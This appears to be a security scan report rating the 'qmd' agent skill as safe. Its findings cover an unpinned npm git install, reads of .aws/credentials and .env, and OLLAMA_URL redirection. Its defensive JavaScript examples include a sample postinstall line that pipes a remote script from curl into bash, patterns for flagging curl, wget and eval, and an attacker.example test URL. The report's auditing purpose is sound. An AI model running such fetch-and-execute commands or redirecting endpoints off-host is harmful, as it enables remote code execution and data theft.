Is qmd safe?

https://clawhub.ai/steipete/qmd

82/100 · SAFE

The qmd skill is a minimal documentation wrapper for a local file search/indexing CLI tool. It contains no prompt injection, hidden code, or malicious behavior. The primary risk is the npm install from a GitHub URL, which delegates code-execution trust to an external repository and to whatever that repository contains at install time. Filesystem monitoring showed the install process opening .aws/credentials and .env (likely OpenClaw runtime behavior rather than the skill), and zero network activity during the monitored install window indicates no data left the host at install time.

Category Scores

Prompt Injection 90/100 · 30%
Data Exfiltration 78/100 · 25%
Code Execution 65/100 · 20%
Clone Behavior 72/100 · 10%
Canary Integrity 100/100 · 10%
Behavioral Reasoning 75/100 · 5%

Findings (6)

MEDIUM NPM install from GitHub URL executes remote code -25

The skill metadata specifies installation via npm install https://github.com/tobi/qmd, which downloads and executes code from an external GitHub repository. Any preinstall, install or postinstall scripts in that package run with the user's privileges, and because this is a git dependency npm also runs the package's prepare script. The URL carries no commit pin, so the code that gets installed is whatever the default branch holds at that moment; pinning to a commit (#<sha>) or reviewing the lifecycle scripts first (and installing with --ignore-scripts where the build allows it) narrows the exposure. While the repository belongs to a well-known developer (Tobi Lutke), this is an inherent trust delegation.
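As an added example (not code from the qmd skill, the qmd project or the scan), the check below parses a package.json and reports which lifecycle hooks npm would run on install, flags commands that fetch or evaluate remote content, and builds a pinned, scripts-disabled install command. The sample manifest is constructed for illustration and is not the real tobi/qmd manifest; the suspicious-command patterns are a starting heuristic, not a complete list.

```javascript
// Added example: audit the lifecycle scripts `npm install <git-url>` would run.

// Hooks npm executes automatically during install. `prepare` is included because
// npm runs it when the dependency is installed from a git URL.
const INSTALL_TIME_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Returns [{hook, command}] for every install-time hook defined in the manifest.
function installTimeScripts(packageJsonText) {
  const pkg = JSON.parse(packageJsonText);
  const scripts = pkg.scripts || {};
  return INSTALL_TIME_HOOKS
    .filter((hook) => typeof scripts[hook] === "string")
    .map((hook) => ({ hook, command: scripts[hook] }));
}

// Heuristic patterns for commands a reviewer should read before allowing them
// (remote fetches piped to a shell, inline evaluation, encoded payloads).
const SUSPICIOUS = [/\bcurl\b/, /\bwget\b/, /\|\s*(ba)?sh\b/, /\beval\b/, /base64/, /\bnode\s+-e\b/];

function flagSuspicious(entries) {
  return entries.filter(({ command }) => SUSPICIOUS.some((re) => re.test(command)));
}

// Pin the git URL to a full commit SHA so later pushes cannot change what is
// installed, and disable lifecycle scripts. `#<commit-ish>` and `--ignore-scripts`
// are standard npm syntax; the package may still need a manual build afterwards.
function pinnedInstallCommand(gitUrl, commitSha) {
  if (!/^[0-9a-f]{40}$/.test(commitSha)) {
    throw new Error("expected a full 40-hex-digit commit SHA");
  }
  return `npm install --ignore-scripts ${gitUrl}#${commitSha}`;
}

// Constructed sample manifest (hypothetical; not the real tobi/qmd package.json).
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: "example-cli",
  version: "1.0.0",
  scripts: {
    build: "tsc",
    prepare: "npm run build",
    postinstall: "curl -s https://example.invalid/setup.sh | bash",
    test: "node test.js",
  },
});

const hooks = installTimeScripts(SAMPLE_PACKAGE_JSON);
console.log("install-time hooks:", hooks);
console.log("needs review:", flagSuspicious(hooks));
console.log(pinnedInstallCommand("https://github.com/tobi/qmd", "a".repeat(40)));
```

In practice, clone the repository at the commit you intend to install, run the audit over its package.json, and only then decide whether lifecycle scripts may run.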

MEDIUM Install process accessed .aws/credentials and .env -18

During installation, the process opened /home/oc-exec/.aws/credentials and /home/oc-exec/.env. No outbound network activity was detected during the monitored window, which suggests nothing was exfiltrated at install time, but a read of cloud credentials during a skill install is a notable concern in its own right: data read at install can be staged and sent later, outside the window. The accesses appear to be the OpenClaw runtime's standard behavior rather than the skill itself; that attribution should be confirmed by observing an install of a skill with no external dependency.

LOW OLLAMA_URL could be redirected to external server -12

The skill references OLLAMA_URL for embeddings/rerank, defaulting to localhost:11434. Anyone who controls the environment the tool runs in (a .env file in the working directory, a modified shell profile, or an agent instructed to set the variable) could point it at an external server. Embedding and rerank requests carry the raw text being embedded or scored, so a redirected endpoint receives document content directly, not merely vectors.
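As an added example (not qmd's own code), the preflight check below refuses any OLLAMA_URL whose host is not the local machine, so a modified environment cannot silently redirect embedding and rerank traffic off-host. The default value comes from the skill's documented localhost:11434; the loopback rules (localhost, ::1, 127.0.0.0/8) and the rejection of embedded credentials are this example's choices.

```javascript
// Added example: validate OLLAMA_URL before any embedding/rerank request is made.

const DEFAULT_OLLAMA_URL = "http://localhost:11434"; // documented qmd default

// True for hostnames that can only resolve to this machine. WHATWG URL
// serializes IPv6 hosts with brackets, so "[::1]" is accepted alongside "::1".
function isLoopbackHost(hostname) {
  const h = hostname.toLowerCase();
  if (h === "localhost" || h === "::1" || h === "[::1]") return true;
  const m = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(h); // 127.0.0.0/8
  return m !== null && m[1] === "127";
}

// Returns a normalized URL string, or throws describing why the value is rejected.
// `env` is passed explicitly so the same check can run over a parsed .env file
// as well as process.env.
function resolveOllamaUrl(env) {
  const raw = env.OLLAMA_URL || DEFAULT_OLLAMA_URL;
  let url;
  try {
    url = new URL(raw);
  } catch (_) {
    throw new Error(`OLLAMA_URL is not a valid URL: ${raw}`);
  }
  if (url.protocol !== "http:" && url.protocol !== "https:") {
    throw new Error(`OLLAMA_URL must be http(s), got ${url.protocol}`);
  }
  if (url.username || url.password) {
    throw new Error("OLLAMA_URL must not embed credentials");
  }
  if (!isLoopbackHost(url.hostname)) {
    throw new Error(`OLLAMA_URL must point at loopback, got host ${url.hostname}`);
  }
  return url.toString();
}

// Non-throwing form for a preflight log line: {ok, url} or {ok, reason}.
function checkOllamaUrl(env) {
  try {
    return { ok: true, url: resolveOllamaUrl(env) };
  } catch (e) {
    return { ok: false, reason: e.message };
  }
}

console.log(checkOllamaUrl(process.env));
console.log(checkOllamaUrl({ OLLAMA_URL: "https://embeddings.attacker.example" }));
```

Run the check once at startup and fail closed; a tool that logs the rejection and continues with the default would hide the tampering the check exists to surface.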

LOW Arbitrary filesystem indexing capability -10

The qmd collection add /path command can index any filesystem path the user has read access to. An agent could be instructed to index sensitive directories such as ~/.ssh or ~/Documents, copying their contents into qmd's local index and making them searchable and retrievable via qmd commands. A harness that drives qmd on a user's behalf should restrict the paths it will pass to this command.

INFO Jiti transpilation cache created in /tmp -5

The install process created transpiled CJS files in /tmp/jiti/. This is standard behavior for the OpenClaw runtime's module loading system and is not attributable to the skill itself.

INFO No outbound network connections during install 0

Despite accessing sensitive files, the monitoring detected zero outbound network connections and zero firewall blocks. This is a strong indicator that no data was exfiltrated during the install phase. The evidence covers only that phase; runtime behaviour, such as the embedding and rerank requests that go to OLLAMA_URL, is a separate question not settled by this observation.